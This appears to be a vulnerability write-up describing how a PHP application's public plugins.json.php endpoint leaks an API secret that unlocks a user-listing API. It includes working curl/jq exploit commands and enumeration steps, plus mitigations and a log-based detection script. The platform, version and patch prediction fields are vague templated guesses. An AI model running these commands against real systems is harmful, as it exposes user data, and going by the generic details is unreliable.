Unknown Platform, Information Disclosure, CVE-Not-Provided (Critical)


How the CVE works (technical details):

  1. The endpoint `objects/plugins.json.php` is publicly accessible without authentication.
  2. This script returns a JSON object containing plugin metadata, including a field named `APISecret`.
  3. The `APISecret` is a static token used by the API endpoint `plugin/API/get.json.php` to authenticate requests.
  4. An attacker sends a GET request to `objects/plugins.json.php` to retrieve the raw JSON.
  5. The response includes the `APISecret` in plaintext under `plugin.object_data`.
  6. The attacker extracts the `APISecret` value using a simple regex or JSON parser.
  7. The API endpoint `plugin/API/get.json.php` expects two parameters: `APIName` and `APISecret`.
  8. It does not verify the request origin or session; it only checks whether the provided `APISecret` matches the stored value.
  9. By supplying the stolen secret, the attacker bypasses all authentication mechanisms.
  10. The API method `users_list` is protected, but it trusts the `APISecret` as sufficient proof of authorization.
  11. The attacker can call `users_list` with additional parameters such as `rowCount` and `current`.
  12. The response returns sensitive user data (usernames, emails, roles, etc.) without any login.
  13. The vulnerability exists because `plugins.json.php` should be restricted to admin users only.
  14. No rate limiting or brute-force protection is applied to either endpoint.
  15. The secret is hardcoded or generated once, making it a static shared secret.
  16. An attacker can also discover other API methods by fuzzing the `APIName` parameter.
  17. The API may allow write operations (e.g., `user_add`, `config_set`) if exposed.
  18. In many deployments, logging does not record unauthenticated accesses to `plugins.json.php`.
  19. The issue is a combination of insecure direct object reference (IDOR) and broken authentication.
  20. Exploitation requires only a single HTTP request to leak the secret, then a second to abuse the API.

dailycve form:

Platform: Generic PHP
Version: Any vulnerable
Vulnerability: Unauthenticated secret leak
Severity: Critical
Date: 2025-03-15

Prediction: Patch within 48h

What Undercode Say:

```bash
# Leak APISecret
curl -s 'http://target/objects/plugins.json.php' | jq '.plugin.object_data.APISecret'

# Exploit API using stolen secret
SECRET=$(curl -s 'http://target/objects/plugins.json.php' | jq -r '.plugin.object_data.APISecret')
curl -G 'http://target/plugin/API/get.json.php' \
  --data-urlencode "APIName=users_list" \
  --data-urlencode "APISecret=$SECRET" \
  --data-urlencode "rowCount=10" \
  --data-urlencode "current=1"
```

Exploit:

  1. GET `/objects/plugins.json.php` → extract `APISecret`.
  2. GET `/plugin/API/get.json.php?APIName=users_list&APISecret=&rowCount=3&current=1` → dump users.
  3. Repeat for other `APIName` values (e.g., `user_roles`, `system_info`).

Protection from this CVE:

  • Move `plugins.json.php` behind admin authentication (session cookie or bearer token).
  • Regenerate `APISecret` and store it hashed; the API should validate using a time-limited nonce.
  • Implement IP whitelisting or rate limiting on the API endpoint.
  • Disable public access to any `.json.php` files via `.htaccess` or web server rules.
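As an added example (not code from the original post or from the affected project), the following log check looks for the two-request pattern described above: a read of `objects/plugins.json.php` followed shortly by calls to `plugin/API/get.json.php` from the same client, plus clients cycling through many distinct `APIName` values. It assumes Apache combined-format access logs and the two endpoint paths named on the page; the sample log lines, addresses and secret value are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlparse
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
LEAK_PATH = "/objects/plugins.json.php"
API_PATH = "/plugin/API/get.json.php"
# Constructed sample lines in Apache combined format: documentation-range addresses,
# placeholder secret value, not taken from any real deployment.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Mar/2025:10:00:01 +0000] "GET /objects/plugins.json.php HTTP/1.1" 200 5120 "-" "curl/8.4.0"
203.0.113.7 - - [15/Mar/2025:10:00:03 +0000] "GET /plugin/API/get.json.php?APIName=users_list&APISecret=PLACEHOLDER&rowCount=10&current=1 HTTP/1.1" 200 2048 "-" "curl/8.4.0"
203.0.113.7 - - [15/Mar/2025:10:00:04 +0000] "GET /plugin/API/get.json.php?APIName=user_roles&APISecret=PLACEHOLDER HTTP/1.1" 200 300 "-" "curl/8.4.0"
203.0.113.7 - - [15/Mar/2025:10:00:05 +0000] "GET /plugin/API/get.json.php?APIName=system_info&APISecret=PLACEHOLDER HTTP/1.1" 200 300 "-" "curl/8.4.0"
198.51.100.2 - - [15/Mar/2025:10:30:00 +0000] "GET /plugin/API/get.json.php?APIName=users_list&APISecret=PLACEHOLDER HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Parse one access-log line into ip, time, path, query dict and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, target, status = m.groups()
    url = urlparse(target)
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "path": url.path, "status": int(status),
            "query": {k: v[0] for k, v in parse_qs(url.query).items()}}

def detect_api_abuse(log_text, window_seconds=300, enum_threshold=3):
    """Flag API calls made shortly after the same client read plugins.json.php,
    and clients that cycle through many distinct APIName values (enumeration)."""
    window = timedelta(seconds=window_seconds)
    last_leak = {}                 # ip -> time of last 200 on plugins.json.php
    api_names = defaultdict(set)   # ip -> distinct APIName values requested
    leak_then_api = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["path"] == LEAK_PATH and ev["status"] == 200:
            last_leak[ev["ip"]] = ev["time"]
        elif ev["path"] == API_PATH and "APIName" in ev["query"]:
            name = ev["query"]["APIName"]
            api_names[ev["ip"]].add(name)
            leaked_at = last_leak.get(ev["ip"])
            if leaked_at is not None and ev["time"] - leaked_at <= window:
                leak_then_api.append({"ip": ev["ip"], "api": name, "time": ev["time"]})
    enumeration = {ip: sorted(n) for ip, n in api_names.items() if len(n) >= enum_threshold}
    return {"leak_then_api": leak_then_api, "apiname_enumeration": enumeration}
```

Note that the secret travels in the query string, so it lands in access logs as well; the sample uses a placeholder for that reason, and a real deployment should treat such logs as sensitive.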

Impact:

  • Full read of user database (names, emails, hashed passwords if exposed).
  • Potential privilege escalation by calling `user_update` or `role_assign` API methods.
  • Complete compromise of the application’s backend data.
  • No authentication required, enabling automated attacks.

Sources:

Reported By: github.com